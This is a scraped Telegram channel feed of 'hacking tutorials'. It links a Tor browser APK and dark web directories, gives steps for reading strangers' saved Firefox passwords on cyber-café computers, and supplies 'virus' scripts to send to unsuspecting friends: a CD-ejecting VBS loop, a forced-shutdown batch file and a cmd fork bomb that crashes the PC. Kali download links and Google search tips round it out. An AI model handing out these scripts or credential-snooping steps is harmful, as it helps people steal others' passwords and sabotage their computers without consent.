Tech Byte
5.1K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
@TechByte_Fire.onion_Tor.Browser.apk
41.9 MB
Fire.onion | Browser + Tor
😉Heaven in apk format😄
By @TechByte
For the list of the dark web sites, the Hidden Wiki has all of them.

The Hidden Wiki is a repository of the most visited websites in the dark web. It has them classified into categories, i.e. Forums, Drugs, Erotica, Blogs...,etc

Here's the Hidden Wiki link (You can even visit it in the clearnet, using an ordinary web browser): thehiddenwiki.org

For an even more comprehensive list, head over to the deep web subreddit: reddit.com/r/deepweb/
👍Do you like this channel? Share it to your friends.


ℹ️ t.me/TechByte

🌟Rate us » t.me/tchannelsbot?start=TechByte

👣Join us on Facebook: https://fb.me/GEEKernel

👥Join our Telegram group: https://t.me/GEEKernel
Viewing Stored Passwords...
</lesson_001:> ...in Firefox Browser


Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted!

Even though we all know it's a bad idea, a lot of people still use their browser's store password function to keep up with all their accounts. While convenient, this shortcut also makes their passwords very easy to find if you have access to the computer they're stored on.

This guide shows you how to view saved passwords in Mozilla Firefox Web Browser
1⃣Firefox users running Windows, first open the main menu (Firefox) in the upper left-hand corner and select Options. If you're on a Mac, hit Firefox, then Preferences.

@TechByte | @RLchannels
2⃣Head over to the Security tab and click Saved Passwords... or simply press P

@TechByte | @RLchannels
3⃣This screen pops up and you can see all the passwords that were used to sign in to a website.

@TechByte | @RLchannels
Tech Byte
Viewing Stored Passwords... </lesson_001:> ...in Firefox Browser Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted! Even though…
Remember, this may be considered rude, or creepy and illegal in most places, and if you get caught, you may be fined or punished, but...

...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.


Please consider giving us an honest rating and review: http://t.me/tchannelsbot?start=TechByte
Writing a Computer Virus
</lesson_001:> ...using Notepad


Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some

Most of us are new at coding so I'm just gonna start with the basic simple ones.

All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.
Tech Byte
Writing a Computer Virus </lesson_001:> ...using Notepad Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some Most of us are new at coding so I'm just gonna start with the basic simple ones. All you need to have…
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them!
Copy and type this Code in Notepad:

Set oWMP = CreateObject(“WMPlayer.OCX.”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep5000
loop


Save it as “FileName.vbs” and send it to an unsuspecting friend.

@TechByte
Tech Byte
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them! Copy and type this Code in Notepad: Set oWMP = CreateObject(“WMPlayer.OCX.”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count>= 1 then For i = 0 to…
2⃣Convey your friend a little message and shut down his / her computer:
Type this code:

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s


Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Tech Byte
4⃣Open Infinite cmd.exe windows to crash PC Type this in Notepad. @echo off :top start goto top Save it as FileName.bat
I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.

@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.

:top - This will be our starting point of our loop.

start - This opens one cmd window

goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].

So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.

To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
Tech Byte
Install Kali 2.0 Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
There's how to install Kali Linux on a Windows PC.

To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.

After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.

@TechByte
@TechByte Kali-Linux-Light-2017-x86.iso
832.7 MB
Kali Linux 2017.1 | 32-bit
Latest Stable Release
@TechByte Kali-Linux-Light-2017-x64.iso
815.7 MB
Kali Linux 2017.1 | 64-bit
Latest Stable Release
@TechByte
Getting the Most out of Google Search
</lesson_001.0:> Search Shortcuts


Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?

These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.


@TechByte
1⃣Weather Forecast

Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast

@TechByte
2⃣Global Time

Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.

@TechByte